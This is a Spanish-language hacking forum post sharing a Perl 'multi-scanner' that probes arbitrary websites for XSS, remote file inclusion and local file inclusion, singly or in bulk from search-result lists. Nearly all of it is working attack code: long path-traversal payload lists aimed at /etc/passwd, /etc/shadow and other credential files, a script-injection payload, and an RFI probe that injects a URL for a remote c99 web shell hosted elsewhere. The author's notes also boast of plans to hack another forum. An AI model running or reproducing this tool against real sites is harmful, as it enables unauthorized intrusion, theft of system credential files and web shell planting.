send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Moe Multi-Scanner by Guason

  • 0 Respuestas
  • 1545 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado dracko.rx

  • *
  • Underc0der
  • Mensajes: 247
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • http://rax0rnet.blogspot.com/
    • Email
« en: Febrero 25, 2010, 11:42:42 am »
Guason ah terminado su multi-scanner in perl. Espero q les sirva.

Este scanea
                 RFI
                 XSS
                 LFI (No disponible)

Entre otras opciones permite el scaneo single (solo una web) o un file para mayor comodidad con varias webs

El resultado se obtiene en el disco C "c:/"

Aca el code


Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#Name program = moe.pl
#Version = beta
#Autor = Guason
#Version = 1.0

use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

menu:

system ("cls");
system (" mode con cols=150");
system ("mode con lines=100");

print q (


11111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111
11111111111111111111110000000010111111111111111111     ----------SINGLE SCAN-------------
11111111111111111111100000000000001111111111111111
11111111111111111111100000000000001111111111111111      1 - Scan XSS
11111111111111111111000110000100000111111111111111      2 - Scan LFI
11111111111111111110001000011011100011111111111111      3 - Scan RFI
11111111111111111000000000000000010011111111111111     
11111111111111110000000100000000000011111111111111
11111111111111111000000000000000000111111111111111     --------------------------------------------
11111111111111110000000100000000000011111111111111
11111111111111110000000001010000000000011111111111
11111111111111110000001001111100000000011111111111
11111111111111110000000001111111011100011111111111    --------MULTIPLE SCAN----------
11111111111111111100000001111111001111111111111111
11111111111111111000010000000000001111111111111111        4 - Multiple scan XSS
11111111111111111110010000000000000011111111111111        5 - Multiple scan LFI  (NO)
11111111111111111111100000000000000011111111111111        6 - Multiple scan RFI
11111111111111111111100000000000000000111111111111       
11111111111111111111000000000000000000111111111111
11111111111111111111100000000000000000001111111111    --------------------------------------------
11111111111111100111100000000000000000001111111111
11111111111111110011110000000000011001111111111111
11111111111111111011111000000111111111111111111111
11111111111111111001111110001111111111111111111111
11111111111111111101111111111111111111111111111111
11111111111111111100111110000011111111111111111111
11111111111111111110111111010101111111111111111111   -----------------------------------------------
11111111111111111110011100000011111111111111111111
11111111111111111110011100110111111111111111111111            7  - About x
11111111111111111110001111110011111111111111111111           8 - Salir del programa
11111111111111111111111111111011111111111111111111
11111111111111111111111111111001111111111111111111
11111111111111111111001111111001111111111111111111  ---------------------------------------------
11111111111111111111001111111101111111111111111111
11111111111111111111001111111101111111111111111111     Autor = Guason
11111111111111111111011111111111111111111111111111
11111111111111111111011111111111111111111111111111
11111111111111111111011111111111111111111111111111

);


print "\n\n";
print "Escoge opcion =";
$opcion = <STDIN>;
chomp $opcion;
print "\n";

if ($opcion == 1 ) { &xss }
if ($opcion == 2 ) { &lfi }
if ($opcion == 3 ) { &rfi }
if ($opcion == 4 ) { &m_xss }
if ($opcion == 5 ) { &m_lfi }
if ($opcion == 6 ) { &m_rfi }
if ($opcion == 7 ) { &about }
if ($opcion == 8 ) { &salir }




if ($opcion =! 1||2||3||4||5||6||7||8) {goto menu ;}





sub lfi {
system ("cls");
print  "\n\n";
print "Pagina web a probar con LFI :::";
$lfi = <STDIN>;
chomp $lfi;
print "\n\n";

print "Objectivo : $lfi\n\nn";



if($lfi !~/http:\/\//){
     $lfi ="http://$lfi";}
@devil=(
'../../etc/passwd%00',
'../../../etc/passwd%00',
'../../../../etc/passwd%00',
'../../../../../etc/passwd%00',
'../../../../../../etc/passwd%00',
'../../../../../../../etc/passwd%00',
'../../../../../../../../etc/passwd%00',
'../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../../..etc/passwd%00',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../..etc/passwd',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../../etc/shadow',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../../etc/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../../etc/security/passwd',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../etc/security/user'
);
foreach $scan(@devil)
{

$run=$lfi.$scan;

print "Probando con $scan\n";

$request =HTTP::Request->new(GET=>$run);
$agent= LWP::UserAgent->new();
$response=$agent->request($request);
if($response->is_success && $response->content =~/root:x:/){

print "\n\n";
print "$lfi = Vulnerable\n";



}
}
print "\n";
syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;

}


sub xss {

system ("cls");
print "\n\n";
print "Escribe la web a explotar con XSS::";
$xssans = <STDIN>;
chomp $xssans;
print "\n\n";

print "Objectivo = $xssans\n\n";

$xsscode='>"<script>alert("Guason")</script><div style="1';
$xss=$xssans.$xsscode;
$agent=LWP::UserAgent->new();
$req=$agent->get("$xss");
if($req->is_success && $req->content=~/Guason/){
print "\n\n";
print "$xssans es Vulnerable\n\n";

} else {
print "\n\n";
print "No es vulnerable\n\n";
}


syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;

}


sub rfi {

system ("cls");
print  "\n\n";
print "Url de la web a explotar con RFI::";
$rfi = <STDIN>;
chomp $rfi;
print "\n\n";

print "Objectivo  = $rfi\n\n";


$rficode="http://younes.by.ru/c99.txt";
$rfid=$rfi.$rficode;
$request =HTTP::Request->new(GET=>$rfid);
$agent= LWP::UserAgent->new();
$response=$agent->request($request);
if($response->is_success && $response->content =~/c99/){

print "\n\n";
print "Es vulnerable !\n";


}  else {
print "\n\n";
print "No es vulnerable\n\n";
}



syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;


}

################################LFI_M is obsolete ########################################33


sub m_lfi {



print "\n";
syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;


}


sub m_xss {

print "\n\n";
print "Url de los googles para XSS:";
$xss= <STDIN>;
chomp $xss;


open ( M_XSS , ">>c:/m_xss.txt" ) ;
print M_XSS "Extrayendo vulnerabilidades XSS de $xss\n\n";

open ( HOLA , $xss ) ;
@googles = <HOLA>;
close HOLA;

foreach $xsss(@googles){

$xsscode='>"<script>alert("Guason")</script><div style="1';
$xss=$xsss.$xsscode;
$agent=LWP::UserAgent->new();
$req=$agent->get("$xss");
if($req->is_success && $req->content=~/Guason/){

print "$xsss = Yes!\n";
print M_XSS "$xsss = Yes!\n";
} else {

print "$xsss = No!\n";
print M_XSS  "$xsss = No!\n";
}

}
print "\n";
syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;


}


sub m_rfi {

print "\n\n";
print "Url de los googles para RFI:";
$rfi= <STDIN>;
chomp $rfi;


open ( M_RFI , ">>c:/m_rfi.txt") ;
print M_RFI "Extrayendo vulnerabilidades RFI de $rfi\n\n";

open ( HOLA , $rfi ) ;
@googles = <HOLA>;
close HOLA;



foreach $rfis(@googles) {

$rficode="http://younes.by.ru/c99.txt";
$rfid=$rfis.$rficode;
$request =HTTP::Request->new(GET=>$rfid);
$agent= LWP::UserAgent->new();
$response=$agent->request($request);
if($response->is_success && $response->content =~/c99/){

print "$rfis = Es vulnerable\n";
print M_RFI "$rfis = Es vulnerable\n";

} else {

print "$rfis = No es vulnerable\n";
print M_RFI "$rfis = No es vulnerable\n";

}


}
print "\n";
syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;


}



sub about {
system ("cls");
print q (

@@@@@@@@@@@@@@@@@@@@@@@@@*@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@   *@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@*  ***@*@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@***@@@@@*@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@**@@@@@@@@*@@@@@@@@@@@@
@@@@@@@@@@@@@@@ *@@@@@@@@@@ @@@@@@@@@@@@
@@@@@@@@@@@@@@@**@@@@@@@@@@**@@@@@@@@@@@
@@@@@@@@@@@@@@@@ @@@@@@@@@@@**@@@@@@@@@@
@@@@@@@@@@@@@@@@**@@@@@@@@@@@**@@@@@@@@@
@@@@@@@@@@@@@@@@@ @@@@@@*****@@@@@@@@@@@
@@@@@@@@@@@@@@@@@**@@@@*@@@* @@@@@@@@@@@
@@@@@@@@@@@@@@@@@@ @@@@*@@@@**@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@*@@@*@@@@   @@@@@@@@@
@@@@@@@@@@@@@@@@@@@*@** *@@    @@@@@@@@@
@@@@@@@@@@@@@@@@@@@*            @@@@@@@@
@@@@@@@@@@@@@@@@@@@             @@@@@@@@
@@@@@@@@@@@@@@@@@@@             @@@@@@@@
@@@@@@@@@@@@@@@@@@@@         *@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@       *@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@           @@@@@@@@@@@
@@@@@@@@@@@@@@@@**@@@*@   *@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@ @@@@@@    @@@@@@@@@@@@@
@@@@@@@@@@@@@@@* *@@@@@ @@*@@@@  @@@@@@@
@@@@@@@@@@@@@@@   *@@@@@@@@@@@@   @@@@@@
@@@@@@@@@@@@@@@    @*@@@@@@@@@    @@@@@@
@@@@@@@@@@@@@@@     @@@@@@@@@@    *@@@@@
@@@@@@@@@@@@@@@     @@@@@@@@@@*   @@@@@@
@@@@@@@@@@@@@@@       @@@@@@@@@   @@@@@@
@@@@@@@@@@@@@@@       *@@@@@@@@  *@@@@@@
@@@@@@@@@@@@@@        @@@@@@@@@  *@@@@@@
@@@@@@@@@@@@@@  @ *  *@@@@@@@@@  *@@@@@@
@@@@@@@@@@@@****@ *@@@@@@@@@@@* ***@@@@@
@@@@@@@@@@@****@@**@@@@@@@@@@@ *@ **@@@@
@@@@@@@@@@**@* @@**@@@@@@@@@@@**@***@@@@
@@@@@@@@@@*@@ *@@*@@@@@@@@@@@@@*@**@@@@@
@@@@@@@@@@@@* *@*@@@@@@@**@@@@@*** **@@@
@@@@@@@@@@*@* ****@@@@@@ *@@@@* @@* *@@@
@@@@@@@@@@ @**@@*  @@@@******  @@@@**@@@
@@@@@@@@@@***@@@@      *@*     @@@@@@@@@
@@@@@@@@@@@ @@@@@*   *@@@@@@  *@@@@@@@@@
@@@@@@@@@@@@@@@@@    @@@@@@@  *@@@@@@@@@
@@@@@@@@@@@@@@@@@** *@@@@@@* **@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@*@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@*@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@***@*@@@@@@@@@***@@@@@@@@

   Este programa fue escrito por Guason = me
   Este lo realice en dos fases uno  Viendo porno y otro jugando al mithlogy titans 
   Este ayuda a verificar vulnerabiliades de una web o de un archivo entero lo que me es
   mucho mas comodo .......
   Simplemente no mando saludos a nadie mmm talvez a explorer de perlenespañol y a soulnet
   los demas por mi mueranse  y pronto voy a hackear el-hacker.net muaaaaaaaaa ajajajajajajaja
  ajajajajajajajajajaj  ajajajajajajajajajaj  ajajajajajajajajajaj  ajajajajajajajajajaj  ajajajajajajajajajaj
   Tambien  mando saludos a los moderadores de el-hacker quienes piensan que se han desazido de      mi baneandome pero NO! porque todavia estoy ahi y me meto en sus narices

     Ja! Pero que malo que soy !

   
  Mis datos =
   
  nOMBRE = Salchichon
  Emal = chairface_darkhat@hotmail.com
  Web = http://guason-cracker.blogspot.com/

);


print "\n";

syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;
}

sub salir {
print "\n\n";
print "Good Bye\n\n\n";
exit 1;
}


Good Bye y suerte a todos
Venta de diseños - Contactar por MP

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

 

¿Te gustó el post? COMPARTILO!



Vuln Hunter 2014 - Website Vulnerability Scanner

Iniciado por ZanGetsu

Respuestas: 10
Vistas: 3578
Último mensaje Febrero 19, 2014, 12:27:07 pm
por GangsteR
Xscan - Basic Network Vulnerability Scanner

Iniciado por Pr0ph3t

Respuestas: 0
Vistas: 1385
Último mensaje Noviembre 30, 2011, 12:35:22 pm
por Pr0ph3t
[JoomlaScan v1.4] Scanner de vulnerabilidades para Joomla

Iniciado por Stiuvert

Respuestas: 8
Vistas: 3825
Último mensaje Septiembre 13, 2013, 11:43:17 pm
por Osw1re
WebVulnScan Scanner + Prueba Online

Iniciado por ZanGetsu

Respuestas: 2
Vistas: 2190
Último mensaje Mayo 21, 2013, 03:57:45 am
por D4rkC0d3r
SQLi Site Scanner (SQPY)

Iniciado por hdbreaker

Respuestas: 3
Vistas: 3697
Último mensaje Octubre 06, 2014, 01:08:40 am
por Baku